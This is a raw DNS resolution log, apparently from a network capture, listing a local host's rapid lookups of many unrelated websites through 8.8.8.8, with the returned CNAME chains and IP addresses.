                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.054358959 CEST8.8.8.8192.168.2.40x7574No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.054358959 CEST8.8.8.8192.168.2.40x7574No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.056250095 CEST8.8.8.8192.168.2.40x5249No error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.056250095 CEST8.8.8.8192.168.2.40x5249No error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.060028076 CEST8.8.8.8192.168.2.40xbf34No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.060028076 CEST8.8.8.8192.168.2.40xbf34No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.072865009 CEST8.8.8.8192.168.2.40xe84aNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.154956102 CEST8.8.8.8192.168.2.40xed61No error (0)www.pdqhomes.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.154956102 CEST8.8.8.8192.168.2.40xed61No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.154956102 CEST8.8.8.8192.168.2.40xed61No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.154956102 CEST8.8.8.8192.168.2.40xed61No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.610296011 CEST8.8.8.8192.168.2.40x2224No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.610296011 CEST8.8.8.8192.168.2.40x2224No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.610296011 CEST8.8.8.8192.168.2.40x2224No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.680196047 CEST8.8.8.8192.168.2.40x1d4cNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.680196047 CEST8.8.8.8192.168.2.40x1d4cNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.680196047 CEST8.8.8.8192.168.2.40x1d4cNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.691418886 CEST8.8.8.8192.168.2.40x573bNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.703350067 CEST8.8.8.8192.168.2.40xfed2No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.703350067 CEST8.8.8.8192.168.2.40xfed2No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.743284941 CEST8.8.8.8192.168.2.40x8785No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.828350067 CEST8.8.8.8192.168.2.40xe1dbNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.855647087 CEST8.8.8.8192.168.2.40xfdf2No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.916152954 CEST8.8.8.8192.168.2.40x7a11No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.979320049 CEST8.8.8.8192.168.2.40xf6e6No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:01.979320049 CEST8.8.8.8192.168.2.40xf6e6No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.226217985 CEST8.8.8.8192.168.2.40x4776No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.226217985 CEST8.8.8.8192.168.2.40x4776No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.226217985 CEST8.8.8.8192.168.2.40x4776No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.235450029 CEST8.8.8.8192.168.2.40x2db1No error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.235450029 CEST8.8.8.8192.168.2.40x2db1No error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.235450029 CEST8.8.8.8192.168.2.40x2db1No error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.240159988 CEST8.8.8.8192.168.2.40xd12fNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.240159988 CEST8.8.8.8192.168.2.40xd12fNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.327157974 CEST8.8.8.8192.168.2.40xa080No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.327179909 CEST8.8.8.8192.168.2.40x4f80No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.327179909 CEST8.8.8.8192.168.2.40x4f80No error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.334413052 CEST8.8.8.8192.168.2.40xa385No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.334413052 CEST8.8.8.8192.168.2.40xa385No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.334413052 CEST8.8.8.8192.168.2.40xa385No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.337555885 CEST8.8.8.8192.168.2.40x155aNo error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.337555885 CEST8.8.8.8192.168.2.40x155aNo error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.337944031 CEST8.8.8.8192.168.2.40x5ec9Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:02.795556068 CEST8.8.8.8192.168.2.40xdefNo error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.018356085 CEST8.8.8.8192.168.2.40xf52cNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.018356085 CEST8.8.8.8192.168.2.40xf52cNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.035562992 CEST8.8.8.8192.168.2.40x52bdNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.035562992 CEST8.8.8.8192.168.2.40x52bdNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.035562992 CEST8.8.8.8192.168.2.40x52bdNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.161655903 CEST8.8.8.8192.168.2.40xb115No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.161655903 CEST8.8.8.8192.168.2.40xb115No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.166275978 CEST8.8.8.8192.168.2.40x4981No error (0)www.petsfan.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.166275978 CEST8.8.8.8192.168.2.40x4981No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.166275978 CEST8.8.8.8192.168.2.40x4981No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.166275978 CEST8.8.8.8192.168.2.40x4981No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.166837931 CEST8.8.8.8192.168.2.40xfdeaNo error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.168418884 CEST8.8.8.8192.168.2.40x95d5No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.188240051 CEST8.8.8.8192.168.2.40x4cd1No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.188240051 CEST8.8.8.8192.168.2.40x4cd1No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.188240051 CEST8.8.8.8192.168.2.40x4cd1No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.246094942 CEST8.8.8.8192.168.2.40xdfcfNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.359949112 CEST8.8.8.8192.168.2.40xbcc6No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.359949112 CEST8.8.8.8192.168.2.40xbcc6No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.359949112 CEST8.8.8.8192.168.2.40xbcc6No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.359949112 CEST8.8.8.8192.168.2.40xbcc6No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.359949112 CEST8.8.8.8192.168.2.40xbcc6No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.759057999 CEST8.8.8.8192.168.2.40xe912No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.759057999 CEST8.8.8.8192.168.2.40xe912No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.766542912 CEST8.8.8.8192.168.2.40xc55aNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.766542912 CEST8.8.8.8192.168.2.40xc55aNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.828778028 CEST8.8.8.8192.168.2.40x7a2dNo error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.859848022 CEST8.8.8.8192.168.2.40xd1f9No error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:03.859848022 CEST8.8.8.8192.168.2.40xd1f9No error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.083405972 CEST8.8.8.8192.168.2.40xf3b1No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.083904028 CEST8.8.8.8192.168.2.40x704bNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.083904028 CEST8.8.8.8192.168.2.40x704bNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.167136908 CEST8.8.8.8192.168.2.40x8a2dName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.172949076 CEST8.8.8.8192.168.2.40x2161No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.230710983 CEST8.8.8.8192.168.2.40xc992No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.230710983 CEST8.8.8.8192.168.2.40xc992No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.230710983 CEST8.8.8.8192.168.2.40xc992No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.453861952 CEST8.8.8.8192.168.2.40x5366No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.480060101 CEST8.8.8.8192.168.2.40x1dfeNo error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.480060101 CEST8.8.8.8192.168.2.40x1dfeNo error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.488696098 CEST8.8.8.8192.168.2.40x643cNo error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.488696098 CEST8.8.8.8192.168.2.40x643cNo error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.488732100 CEST8.8.8.8192.168.2.40x680fNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.488732100 CEST8.8.8.8192.168.2.40x680fNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:04.504144907 CEST8.8.8.8192.168.2.40x457cNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.034826994 CEST8.8.8.8192.168.2.40x6126No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.266149998 CEST8.8.8.8192.168.2.40xb8b8No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.506130934 CEST8.8.8.8192.168.2.40xe7b4No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.744483948 CEST8.8.8.8192.168.2.40x50f5No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.744483948 CEST8.8.8.8192.168.2.40x50f5No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.754746914 CEST8.8.8.8192.168.2.40xb91aNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.754746914 CEST8.8.8.8192.168.2.40xb91aNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.756277084 CEST8.8.8.8192.168.2.40xd3ebNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.756277084 CEST8.8.8.8192.168.2.40xd3ebNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.756277084 CEST8.8.8.8192.168.2.40xd3ebNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.759533882 CEST8.8.8.8192.168.2.40x364dNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.762356997 CEST8.8.8.8192.168.2.40xc82bName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.767241001 CEST8.8.8.8192.168.2.40xe5aaNo error (0)www.cokocoko.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.767241001 CEST8.8.8.8192.168.2.40xe5aaNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.767241001 CEST8.8.8.8192.168.2.40xe5aaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.767241001 CEST8.8.8.8192.168.2.40xe5aaNo error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.769043922 CEST8.8.8.8192.168.2.40x69c4No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.769043922 CEST8.8.8.8192.168.2.40x69c4No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:05.930036068 CEST8.8.8.8192.168.2.40xc600No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.177808046 CEST8.8.8.8192.168.2.40x12d1No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.180221081 CEST8.8.8.8192.168.2.40x3db8No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.180221081 CEST8.8.8.8192.168.2.40x3db8No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.214996099 CEST8.8.8.8192.168.2.40xc6a5No error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.214996099 CEST8.8.8.8192.168.2.40xc6a5No error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.551119089 CEST8.8.8.8192.168.2.40x81c8No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.553297997 CEST8.8.8.8192.168.2.40xceaeNo error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:06.553297997 CEST8.8.8.8192.168.2.40xceaeNo error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.054897070 CEST8.8.8.8192.168.2.40x440bNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.054897070 CEST8.8.8.8192.168.2.40x440bNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.471276999 CEST8.8.8.8192.168.2.40xc16fNo error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.471276999 CEST8.8.8.8192.168.2.40xc16fNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.477924109 CEST8.8.8.8192.168.2.40xa923No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.658569098 CEST8.8.8.8192.168.2.40xce76No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.754276037 CEST8.8.8.8192.168.2.40xc1f9No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:07.776590109 CEST8.8.8.8192.168.2.40x7a8No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.076926947 CEST8.8.8.8192.168.2.40x5575No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.547549963 CEST8.8.8.8192.168.2.40x1740No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.554392099 CEST8.8.8.8192.168.2.40xbc60No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.554392099 CEST8.8.8.8192.168.2.40xbc60No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.742634058 CEST8.8.8.8192.168.2.40x6d60No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.799386978 CEST8.8.8.8192.168.2.40x71fNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.799386978 CEST8.8.8.8192.168.2.40x71fNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.799386978 CEST8.8.8.8192.168.2.40x71fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.799386978 CEST8.8.8.8192.168.2.40x71fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.864012957 CEST8.8.8.8192.168.2.40xb9beNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.864012957 CEST8.8.8.8192.168.2.40xb9beNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.864012957 CEST8.8.8.8192.168.2.40xb9beNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.864012957 CEST8.8.8.8192.168.2.40xb9beNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.864012957 CEST8.8.8.8192.168.2.40xb9beNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.910533905 CEST8.8.8.8192.168.2.40x71fNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.910533905 CEST8.8.8.8192.168.2.40x71fNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.910533905 CEST8.8.8.8192.168.2.40x71fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.178.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.910533905 CEST8.8.8.8192.168.2.40x71fNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.165.108.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.934459925 CEST8.8.8.8192.168.2.40x39deNo error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:08.959433079 CEST8.8.8.8192.168.2.40xc1a9No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.078816891 CEST8.8.8.8192.168.2.40x5575Server failure (2)www.speelhal.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.719814062 CEST8.8.8.8192.168.2.40xe1c9No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.737250090 CEST8.8.8.8192.168.2.40xd598No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.737250090 CEST8.8.8.8192.168.2.40xd598No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:09.737250090 CEST8.8.8.8192.168.2.40xd598No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:10.043215036 CEST8.8.8.8192.168.2.40xe823No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
